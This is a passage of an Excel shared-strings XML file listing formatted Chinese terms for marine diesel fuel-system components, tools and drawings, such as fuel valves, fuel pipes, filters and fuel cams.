    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油单元的配置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油单元的外形</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀保护板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀保护板放泄口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀测试工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀和燃油泵用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀检查套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀检修套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀壳体毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀柱塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油放泄管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油放泄箱布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油分油机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">- </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作模式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油负荷锁止装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油复式滤清器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油高压管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油高压管，连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管，电加热</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管，进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管，重装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管包绝缘材料</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管刀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管防护罩，重油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管固定支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管加热</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管进出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管进出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管调整</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管铣刀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管泄加热</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管研磨棒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管座铣刀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油滚轮导套轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油过滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废物盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油过滤器的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油回管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油回路主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油回油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油混合单元管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油及其处理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油接头布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油进口滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油进口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动注油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油进口主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油控制面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油连接管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油漏泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油漏油监测器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油滤器供货图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油滤器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油滤清器元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油密封装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油排放支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油排气齿轮</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷管供货图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷射泵滑油管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷射泵漏油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷射泵套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷射阀漏油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷射系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷嘴，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷嘴，模型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷嘴支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油品质</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油气体阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油伺服系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油调节阀布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油凸轮，开口或盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油凸轮冲击搬手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油凸轮定位</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油凸轮工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油凸轮滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油凸轮开口轮毂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油凸轮模板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油凸轮维修</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油图表，重油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重油主要及辅助系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统，柴油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统，船用柴油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统，轻油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统变更</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统串油建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统错误</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水均布</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统手动停止阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
